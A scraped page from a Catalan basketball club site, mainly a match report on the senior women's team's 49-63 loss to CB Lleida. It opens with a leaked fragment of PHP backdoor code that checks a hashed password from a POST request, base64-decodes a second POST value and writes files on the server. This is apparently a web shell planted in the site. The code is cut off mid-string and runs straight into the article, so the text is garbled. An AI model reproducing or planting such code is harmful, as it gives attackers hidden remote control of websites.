function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení desaprofita una gran primera meitat i cau contra la defensa en zona del CB Lleida (49-63) - Tgn Bàsquet Club -

El sènior femení desaprofita una gran primera meitat i cau contra la defensa en zona del CB Lleida (49-63)

Updated: gener 12, 2019

Un partit de dues cares. Com una moneda. El sènior femení del TGN Bàsquet va mostrar que és capaç de fer un joc excels i desaparèixer completament en el mateix partit, tot en l’interval que dura la pausa de la mitja part. Les noies que entrena Juan Carlos Arjona van certificar, segurament, el millor quart que han jugat aquest curs (el segon del matx) després de fer un parcial de 16-0 que deixava el resultat en 33-27 al descans. Amb tot, la segona meitat va ser completament diferent i les liles van viure un malson en forma de defensa zonal del seu rival. Només 10 punts en 17 minuts i mig de joc per acabar anotant, gràcies a la inspiració final de Cristina Peña, 16 en tot el tercer i quart períodes.

Va ser un partit ple de novetats i que apuntava a dia històric i punt d’inflexió en la trajectòria del conjunt tarragoní, que ha guanyat només tres partits fins ara i ocupa zona de descens directe. Per una banda, debutava el nou fitxatge del TGN Bàsquet, la nord-americana Laura Hughes, una pivot molt gran (1,88 m) que ha patit, però, el rigor arbitral de la categoria. En un tres i no res, Hughes ha vist com la parella arbitral li xiulava dues faltes en atac en poc més de tres minuts de joc. En la segona meitat, tot i estar sotmesa a una defensa molt intensa del CB Lleida, amb dos i, fins i tres contra un al pal baix, els col·legiats només han castigat les visitants amb cinc faltes sobre Hughes, les mateixes que li han assenyalat a ella (de les cinc faltes, tres en atac), convertint-se en l’única jugadora eliminada del matx. El partit ha servit també per veure la reaparició de la base Laura Pascual. Tot i que inicialment no estava previst que jugués perquè feia gairebé dos mesos que estava lesionada (es va fer mal al turmell el 16 de novembre), Pasku ha entrat a pista a la meitat del segon quart i amb ella dirigint el joc, el TGN Bàsquet ha fet els seus millors minuts. Aquest període de bon joc lila ha coincidit, a més, amb el debut amb la samarreta del sènior femení de Sofía Llanos, una jugadora cadet de segon any que ha mostrat molt bones maneres. Llanos ha aportat intensitat a l’equip i una dosi d’energia que ha servit per veure la millor actuació de les liles de tota la temporada. Només la mitja part ha evitat una exhibició més gran.

Com el dia i la nit

El partit ha començat malament pel TGN Bàsquet. El CB Lleida ha sortit molt fort i ha marcat un parcial de sortida de 0-7. Aleshores ha començat el recital de triples de les tarragonines. Peña, Ejimeno, Peña una altra vegada i Vadillo han anotat des de la línia de tres punts i han capgirat el resultat (14-12 a 1:36 del final del 1Q). El CB Lleida, que semblava estabornit, ha reaccionat i ha acabat el període per davant (16-14).

El segon quart ha començat com el primer. Un dos més un de les de la Terra Ferma ha obert una petita escletxa en el resultat (14-19) però Peña, que en els primers vint minuts ha demostrat perquè ha estat seleccionada per disputar el concurs de triples de l’All-Star (també jugarà el partit de les millors jugadores de la categoria, juntament amb Laura Pascual) ha tornat a clavar un altre triple tot just abans que les lleidatanes agafessin novament embranzida per situar un preocupant 17-27 al marcador. Aleshores ha arribat l’allau de joc lila. El tècnic local, Juan Carlos Arjona, ha situat una defensa pressionant que ha ofegat les visitants, que han perdut moltes pilotes —fins i tot sense poder creuar mitja pista—. La bona coordinació en els dos contra un laterals, la concentració i l’envergadura de braços de jugadores com Llanos, han permès recuperar moltes pilotes i anotar en contraatacs d’un contra zero. En defensa cinc contra cinc, a més, les tarragonines han estat eficaces en minuts on el CB Lleida no ha tingut punteria des de la línea de tres punts i el rebot defensiu —bons minuts de Laia López en aquest aspecte; tant l’aler pivot del TGN Bàsquet com Vadillo han complert molt bé substituïnt Hughes, que s’havia carregat de faltes— ha estat un baluard important per entendre el parcial de 16-0 que ha servit per tancar la primera meitat (33-27).

La segona meitat ha estat totalment diferent. El CB Lleida ha aprofitat el descans per a plantejar una nova estratègia. Tot i els 6 triples del TGN Bàsquet en els dos primers quarts, les lleidatanes han situat una defensa 2-3 que ha estat un obstacle insalvable per a les tarragonines. El TGN Bàsquet s’ha aturat completament. La pilota ha circulat molt lenta i de forma previsible. No hi ha hagut idees, ni moviment sense pilota. Les visitants han tancat molt bé les línies de passada a Hughes (una jugadora per davant i una o dues per darrere sempre) i això ha dificultat el joc d’atac local. La pivot nord-americana, que té molt bona visió de joc, ha actuat com a repetidor dins la zona, obrint la pilota a la jugadora exterior desmarcada però en aquesta segona meitat no han entrat els triples. Només un encert.

Amb les tarragonines bloquejades —Arjona ha mogut la banqueta i ha demanat temps morts, però sense resultat—, el CB Lleida ha crescut des de la confiança defensiva però, també des de l’encert en el perímetre. Tres triples visitants en el tercer quart han començat a capgirar la balança del costat de les jugadores lleidatanes (37-41 a 3:39 del final del període), que han acabat amb un avantatge de 6 punts (39-45)

Impotència. Aquesta seria la paraula que definiria l’últim període. El CB Lleida ha jugat a plaer anotant des de tot arreu mentre el TGN Bàsquet no trobava forats en la defensa rival. Les tarragonines només han anotat un punt (i de tir lliure) en els primers 7 minuts i mig del quart i el marcador mostrava aleshores un contundent 40-56. El desavantatge ha arribat a ser de 17 punts (42-59) en uns minuts de domini absolut de les noies de la Terra Ferma.

El TGN Bàsquet necessita refer-se ben aviat de la derrota perquè la setmana vinent juga dos partits contra rivals directes en la lluita per evitar el descens. El divendres, contra el Joventut Les Corts al pavelló del Sagrat Cor en el matx corresponent a la jornada 5 i que es va ajornar en el seu moment. Diumenge el matx serà contra el Bencriada a domicili.